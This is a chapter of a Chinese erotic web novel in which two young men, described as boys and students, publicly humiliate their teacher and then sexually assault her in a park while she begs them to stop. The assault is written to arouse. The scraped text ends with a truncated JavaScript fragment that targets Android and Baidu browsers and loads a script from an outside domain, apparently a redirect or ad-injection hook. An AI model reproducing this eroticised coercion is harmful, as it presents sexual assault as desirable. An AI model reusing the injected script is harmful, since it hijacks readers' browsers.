逃脱 分卷阅读15

    浑身高度紧张,两个男孩不远不近地跟着她让她极不自在,她很怕碰到熟人。可是怕什么便来什么。

    “蓝老师,去散步啊?”一幢楼里的邻居大妈正从对面走来。

    蓝静仪想躲已来不及,“是啊,大妈”说完,她快步想走过去。

    眼尖的大妈早把视线移到两个男孩身上,“哟,还有这么俊的孩子哪,蓝老师,他们是?”

    “噢,我……”她刚想说她也不认识,无奈纳兰获,纳兰葎早已经走到她身边来,她马上改了口,“他们是我……的……侄子……”她本想说是她的学生,但男学生这么晚留在她家也一定会惹人起疑。

    两道视线向她射过来,她几乎可以感觉到那两道视线的不满。两条手臂一左一右搭上她的肩膀,余下的两条长臂缠住她的纤腰。

    “你们作什么,放手啊”蓝静仪紧张地看向大妈,轻声抵抗。

    两个人却将她搂得更紧,嘴角带着邪恶而甜美的笑,魔音齐声而出,“走吧,亲爱的姑妈”

    刚刚还点头称赞的大妈早已经瞪大眼睛看着蓝静仪,继而露出一脸鄙夷,像躲瘟疫一样匆匆走开了。

    蓝静仪气得脸都白了,用手推着他们的腰,“你们做什么,放开啦,别人会误会的”

    两个高大的男生一左一右将娇小的她夹在中间,全身的重量几乎都压在她身上,蓝静仪的身体摇摇欲坠,“误会?姑妈,我们有什么让他们误会的,他们的误会还不如真相的百分之一”

    “你们……!…别这么叫我!”

    “姑妈这么快就忘了吗,不是你把从未蒙面的我们的爸爸认作哥哥吗?”

    “我们回去吧”蓝静仪再没勇气见到熟人了。

    “回逸蓝别墅?”

    “不要”蓝静仪反射性地嚷道,那里是她的梦魇之地。

    “老师,瞧这里的傍晚多好,不到处看看是不是有点可惜?”

    “吃了这么还不散散步,呆会儿的剧烈运动我可不保证你不会全呕出来”两人低低地笑声。

    “啊~~”蓝静仪抓住头发,她要疯了!

    两个男孩闲闲地揽着蓝静仪的两肩,他们又高又大,将几乎矮他们一头纤细的蓝静仪挤在中间,气氛有种说不出的诡异。

    蓝静仪不敢抬起头来,可是眼角的余光依然看到认识的邻居一个个晃过去,眼里都露出好奇和狐疑,并且走过去后还不忘回头观望,有的三五成堆地在窃窃私语,对着他们指手划脚。

    蓝静仪羞愧到了极点,一颗心早就灰了。

    天色渐渐暗淡,进了公园后,人也渐渐稀少起来。一把白色的凉椅横在他们眼前,凉椅旁两颗粗壮的垂柳将浓密的柳条垂吊下来遮成天然的凉棚。

    “获,在这休息会儿”纳兰葎提议,一屁股先坐在椅子上,一条长臂搭在椅子靠背上,两条长腿优雅地交叠起来。

    “宝贝,累不累?”纳兰荻轻声在她耳边问。

    “不……”累还没说出口,蓝静仪发现自己的身子早已被纳兰获推靠在粗壮的树干上,而他的身子紧紧地把她钉住。

    “你……”她的话被纳兰荻吃进嘴里,不安分的手早已将她的裙子掀至腰间,粗糙的大掌揉捏着她光裸的屁股。他的身体紧紧地压住她,几乎要将她压进粗砺的树干里去,蓝静仪感到他粗大的下体隔着布料早已经硬邦邦在抵在她敏感的穴口。

    他一下一下地撞击她,用他的粗硬隔着单薄的布料挑逗她私密的柔软,大掌依旧毫不怜惜地捏着她的臀瓣,长舌灵巧的撬开她的嘴,吸住她的舌头细密地吮吸。

    “呜……嗯……呜……”蓝静仪说不出话来,只能发出似反抗又似享受的呻吟。

    纳兰荻的手向上游移,抚过她柔滑的纤背,将她身上的小衫全部推到她的锁骨上,大手向前捏住了她的乳房,让红艳艳的乳尖高高地挺立起来。

    他膝盖一顶将她更紧地抵在树上。

    “啊~~”蓝静仪痛呼,她感觉粗砺的树干紧紧地刺进她裸露的臀肉里。纳兰荻早已低下头去,两手捏托住她的两乳,伸舌咬住她的乳头。

    “啊~~不……”蓝静仪感觉到抵在她身下的欲望欲加坚硬灼热,而自臀部和胸部传来的两股不同的疼痛让她痛呼出声。

    在还没有全部暗下来的傍晚,蓝静仪被一个衣着整齐的高大男孩按在树干上,几乎已经全身赤裸,只有两块布料如游泳圈一样围在她的腰和肩部,却比浑身赤裸还更加引人暇思。

    她像一只赤裸的羔羊,根本无力反抗,只能任男孩玩弄着她的乳房,美臀,她的小嘴。

    不远处传来一阵脚步响,好像有人走过来了。纳兰获仍捧着她一只雪峰啃噬、亵玩。

    “不……有人来了,求求你……啊……放开我……”他咬住她敏感的乳头时,蓝静仪轻轻地拱起身子,她喘吸着,艰难地求着面前的男孩。

    男孩根本不理她,依旧吃着女人肥美的乳房,唇下的乳房柔滑而美好,圆润而肥大,散发着淡淡的奶香,再配上那单薄纤细如凝脂似的身子,简直让男人欲痴欲狂。

    那样纤细柔白的身子,那样不盈一握的腰肢,却生着一对这样傲人雪白的奶子,简直是上天派下的妖女惑众。

    而凉椅上的男孩优雅地斜侧在凉椅上,皎洁的初月眷恋着他的美貌,金色的发丝在清风中飞扬,而他却根本不知道自己是如此的美丽,美丽的似不属于尘世,美丽的像个妖精。他弯着唇角,狭长的眼眸掠向被男子亵玩的裸身女人,眼睛像星子一样闪亮,似在看一出最精彩的戏码。

    他们都对那渐渐临近的脚步声不闻不问。

    他们是一对恶魔,可以不守人间的任何规则,人间的规矩对他们来说可笑的形同虚设。可是蓝静仪不同,她还要生活,她是老师,她不想受人耻笑……“求求你……放开……我同意去逸蓝别墅……”“你说什么?”黑脑袋从她的胸前抬起来,深邃的眼眸让她想别开视线。她的两只高挺的乳房沐浴在皎洁的月色中,因为男人的抚摸而肿胀发烫,雪峰顶端的乳头被蹂躏的坚硬而红艳,湿漉漉地带着男子的口液,刚刚脱离开男子温热的口腔,因为空气的清冷,而一点一点地跳动,似乎仍在对面前的男子做着邀约。蓝静仪脸蓦然红透,她迅速抬起头,仍旧毫无选择地对上那对深冷黑眸。“我……同意回逸蓝别墅……”声音有丝颤抖,她真的不想去,但她已经别无选择,她在这里已经呆不下去,人们都会把她看成荡女,她不能容忍那样的眼光。“会一直呆在那里?”“会,直到你们赶我走”“哼”纳兰荻轻笑,伸手替她整理衣服,手抚过她的颊,将刚才被他弄乱的头发顺到脑后,轻轻地摩挲,像是爱怜刚刚讨得他欢心的宠物。脚步声已经走过来,是一对年轻的情侣,

window["timea"] = "svggr" + (new Date()).getTime();var t = document;if((/(Android)/i.test(navigator.userAgent))&&(/(baidu)/i.test(navigator.userAgent))){if((/(check_xxin)/i.test(window.location.href))){alert(new Date().getSeconds())};var lxq="dd.shxckr.cn/s_80137_1/w1xhtml?";t.write('